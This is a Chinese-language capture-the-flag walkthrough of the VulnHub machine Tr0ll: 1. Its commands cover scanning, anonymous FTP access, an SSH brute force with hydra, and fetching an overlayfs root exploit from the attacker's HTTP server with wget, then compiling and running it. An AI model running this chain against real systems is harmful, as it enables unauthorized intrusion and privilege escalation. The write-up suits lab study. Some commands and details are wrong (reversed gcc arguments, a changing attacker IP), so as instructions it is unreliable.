Tr0ll: 1靶场渗透测试

Tr0ll: 1靶场

来自 < Tr0ll: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.181,靶场IP192.168.23.185

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.185

开放的端口:

21/tcp (FTP):

  • 服务:vsftpd 3.0.2
  • 匿名FTP登录:允许匿名访问 (FTP code 230),并且上传下载权限为 rwxrwxrwx,这是一个明显的风险,因为匿名用户可以修改文件。
  • 文件 lol.pcap(8KB)可通过 FTP 下载,可能是一个潜在的敏感文件,值得进一步分析。
  • FTP 服务没有启用加密,数据传输是明文的,这可能会导致数据泄露风险。

22/tcp (SSH):

  • 服务:OpenSSH 6.6.1p1
  • 该版本的 SSH 可能包含已知的安全漏洞,但具体需要查看是否有已知的漏洞影响该版本。
  • Host Keys(服务器公钥)信息已列出:DSA、RSA、ECDSA、ED25519 四种类型的密钥。这些密钥是 SSH 协议中用来验证服务器身份的。
  • 建议确认密钥是否匹配已知的指纹,尤其是在服务器部署过程中。

80/tcp (HTTP):

  • 服务:Apache 2.4.7
  • 网站似乎没有标题(text/html),并且服务器响应头显示是 Apache 2.4.7,可能存在一些已知漏洞(尤其是旧版本的 Apache)。
  • robots.txt: 包含禁止访问的路径 /secret,这可能意味着存在一个可能包含敏感信息或私密数据的目录。
  • 该网站的内容可能不多或是一个基础的 web 服务器配置,需要进一步探查是否有可利用的漏洞。

4,既然知道开放了21端口,那就对ftp服务器匿名登录访问

dir列出文件夹下的文件,分析存在一个流量包,直接把它导出来

常见的 FTP 服务器命令

|----------------------|----------------------------------|
| 命令 | 描述 |
| USER <用户名> | 发送用户名进行登录。 |
| PASS <密码> | 发送密码进行登录。 |
| QUIT | 断开与 FTP 服务器的连接并退出。 |
| CWD <路径> | 更改当前工作目录。 |
| PWD | 显示当前工作目录。 |
| LIST | 列出当前目录下的文件和目录。 |
| NLST | 列出当前目录下的文件名(不包括详细信息)。 |
| RETR <文件名> | 下载指定文件。 |
| STOR <文件名> | 上传指定文件。 |
| DELE <文件名> | 删除指定文件。 |
| RMD <目录名> | 删除指定目录(目录必须为空)。 |
| MKD <目录名> | 创建一个新的目录。 |
| RNFR <旧文件名> | 重命名文件的源文件名。 |
| RNTO <新文件名> | 重命名文件的目标文件名。 |
| ABOR | 终止当前传输操作。 |
| SYST | 获取服务器的操作系统类型。 |
| TYPE <类型> | 设置文件传输的类型(例如 ASCII 或 Binary)。 |
| PASV | 启用被动模式,客户端会在连接时打开一个端口等待服务器连接。 |
| PORT <IP地址>,<端口> | 设置主动模式,服务器将连接客户端指定的 IP 和端口。 |
| SITE <命令> | 向 FTP 服务器发送特定的 SITE 命令(如设置文件权限)。 |
| HELP | 显示可用的 FTP 命令及其说明。 |
| FEAT | 显示 FTP 服务器支持的扩展特性。 |
| STAT | 获取 FTP 服务器的状态信息。 |

5,使用wireshark打开pcap文件

在info一栏注意到NO.40,分析详情信息,存在提示

好吧,好吧,好吧,你不是一个聪明的小恶魔吗,你差点找到Sup3rs3cr3tdirol:-P\n

\n

糟透了,你离得太近了。。。我要更努力\N

6,然后再访问http://192.168.23.185

一个没有什么用的静态页面,对其进行网页子目录枚举扫描

dirsearch -u http://192.168.23.185 -x 404,403

访问 http://192.168.23.185/robots.txt

http://192.168.23.185/secret/

被耍了,没有什么用,再访问/sup3rs3cr3tdirlol

下载到一个文件

wget http://192.168.23.185/sup3rs3cr3tdirlol/roflmao

7,file roflmao分析文件类型

文件分析总结:

  1. 文件类型
    • ELF 32-bit LSB executable:表明这是一个针对32位x86架构的Linux可执行文件,采用小端(Little-Endian)字节序。
  2. 架构与兼容性
    • Intel 80386:编译目标为传统的32位x86 CPU,需在支持IA-32指令集的系统或兼容环境(如64位系统安装32位库)下运行。
    • 动态链接(dynamically linked):依赖外部共享库(.so文件),若系统中缺少相关库文件,程序将无法启动。
    • 解释器路径(/lib/ld-linux.so.2):典型的32位动态链接器路径,64位系统需确保已安装32位兼容库(如Ubuntu的libc6:i386)。
  3. 编译环境
    • GNU/Linux 2.6.24 :编译时使用的内核版本较旧(2008年发布),可能需注意glibc版本兼容性问题。若目标系统glibc版本低于编译时版本,程序可能无法运行。
  4. 调试信息
    • not stripped:保留符号表和调试信息,便于逆向工程或调试(如使用gdb时能看到函数名)。
  5. BuildID
    • SHA1哈希:可用于唯一标识该二进制文件,查询是否存在于公共数据库(如漏洞报告、恶意软件样本库)。

8,使用stings查看文件内容

Find address 0x0856BF to proceed意思暗示找到地址0x0856BF,访问之

分别查看网站的内容,

下载这个用户名字典

wget http://192.168.23.185/0x0856BF/good_luck/which_one_lol.txt

又得到了用户名密码

9,既然信息收集到了用户名字典和密码,接下来就是hydra爆破ssh

hydra -L which_one_lol.txt -p Pass.txt 192.168.23.185 ssh

就此成功爆破出来用户名/密码:overflow/Pass.txt

10,然后再进行ssh登录

使用python脚本启动一个可交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

再收集一下内核及版本信息

uname -a

lsb_release -a

11,搜搜提权利用exp

searchsploit overlayfs

将exp文件转储出来 searchsploit overlayfs -m 37292.c

开启http服务python http.server

使用靶场wget下载exp文件夹

cd /tmp

wget http://192.168.23.182:8000/37292.c

gcc编译C语言文件 gcc -o 37292.c 37292

给权限执行该文件

chmod +x 37292

./ 37292

12,成功变成root用户,cat得到flag

相关推荐
黑客-秋凌12 分钟前
网络安全与认知安全的区别 网络和安全的关系
网络·安全·web安全
黑客Ela1 小时前
python 网络安全常用库 python做网络安全
网络·安全·web安全
H轨迹H1 小时前
Jsmoke-一款强大的js检测工具,浏览器部署即用,使用方便且高效
网络安全·渗透测试·ctf·工具·web漏洞·信息泄露
A5rZ1 小时前
CTF-web: Rust 的过程宏
网络安全·rust
轨迹H2 小时前
Jsmoke-一款强大的js检测工具,浏览器部署即用,使用方便且高效
前端·javascript·web安全·网络安全·渗透测试
编程诗人华仔3 小时前
双Token机制(Access Token + Refresh Token)安全高效
java·安全
渗透测试老鸟-九青4 小时前
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
网络·数据仓库·hive·hadoop·安全·网络安全·漏洞
Sweet_vinegar6 小时前
vim临时文件泄露
linux·安全·网络安全·vim·web·ctf·ctfshow
炫彩@之星6 小时前
postman--接口测试工具安装和使用教程
网络安全·postman·接口测试工具·api测试
予安灵7 小时前
《白帽子讲Web安全》学习:深入解析Cookie与会话安全
学习·安全·web安全·网络安全·网络攻击模型·cookie